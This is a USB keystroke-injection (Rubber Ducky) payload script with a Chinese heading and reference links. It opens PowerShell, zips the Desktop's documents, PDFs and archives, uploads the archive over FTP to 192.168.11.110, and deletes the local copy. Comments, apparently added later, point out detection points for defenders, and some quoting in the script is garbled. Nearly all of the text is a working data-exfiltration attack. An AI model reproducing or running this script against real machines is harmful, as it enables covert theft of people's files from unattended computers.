样例代码:
搜索所有 doc 文档并上传到 FTP
REM Keystroke-injection sample: a USB HID device types the PowerShell session below.
REM What the typed commands do: archive documents found under the user's Desktop
REM into c:\a\Report.zip, upload that archive over FTP, then delete the local copy.
REM Defender notes: the whole chain needs an unlocked session and an accepted new
REM keyboard device. Observable points are a new HID keyboard enumeration, an
REM interactive powershell.exe started from the Run dialog (explorer.exe parent, and
REM the command is kept in the user's RunMRU registry history), PowerShell script
REM block logging (event 4104) of the typed lines, and outbound FTP from powershell.exe.
REM Stage 1: open the Run dialog (GUI r) and start an interactive PowerShell window.
DELAY 250
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
REM DOWNARROW is repeated 100 more times, then ENTER is sent twice.
REM NOTE(review): the purpose of this key sequence is not evident from the page - confirm.
DOWNARROW
REPEAT 100
ENTER
DELAY 250
ENTER
REM Stage 2: build the source directory. $folderDateTime is empty at this point,
REM so $userDir resolves to %USERPROFILE%\Desktop.
STRING $folderDateTime = ''
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Desktop' + $folderDateTime
ENTER
STRING $fileSaveDir = $userDir
ENTER
STRING echo $fileSaveDir
ENTER
REM Stage 3: define copy-ToZip, which stages matching files into a fixed archive path.
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
REM Fixed staging path; a file named Report.zip appearing under c:\a is a host artifact.
STRING $zipFile = 'c:\a\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
REM Writes a short PK-prefixed byte sequence (chars 5, 6, then 18 repetitions of char 0);
REM presumably an empty ZIP container so the shell treats the path as a compressed
REM folder - confirm.
STRING set-content $zipFile (@PK@ + [char]5 + [char]6 + (@$([char]0)@ * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
REM Uses the Shell.Application COM object rather than a compression cmdlet.
REM COM object creation from PowerShell is restricted under Constrained Language Mode.
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
REM Recursive search under the Desktop for .doc, .docx, .pdf, .zip and .rar files.
STRING $files = Get-ChildItem -Path $srcdir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
REM Polls once per second until the copied item is visible in the archive.
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
REM Stage 4: run the archiving function against the Desktop path.
STRING $final = 'c:\a\Report.zip'
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
REM $folderDateTime is assigned only here, after $userDir was built; nothing later reads it.
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
REM Stage 5: upload over FTP with System.Net.WebClient. The sample target is a
REM private-range address and the URL carries no credentials. FTP is unencrypted,
REM so egress filtering and network monitoring can both block and observe this transfer.
STRING $ftpAddr = 'ftp://192.168.11.110/Report.zip'
ENTER
STRING $browser = New-Object System.Net.WebClient
ENTER
STRING $url = New-Object System.Uri($ftpAddr)
ENTER
STRING $browser.UploadFile($url, $final)
ENTER
REM Stage 6: delete the local archive and close the PowerShell session. After this,
REM evidence lives in logs (process creation, script block, network) rather than on disk.
STRING remove-item $final
ENTER
STRING exit
ENTER
REM Trailing ENTER keystrokes sent after the session exits.
ENTER
ENTER
ENTER
ENTER
ENTER
ENTER
参考文献:
http://www.ducktoolkit.com/Home.jsp
http://sec.chinabyte.com/410/13056910.shtml
http://www.freebuf.com/sectool/47411.html
https://hakshop.com/products/usb-rubber-ducky-deluxe
https://github.com/skysploit/simple-ducky
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads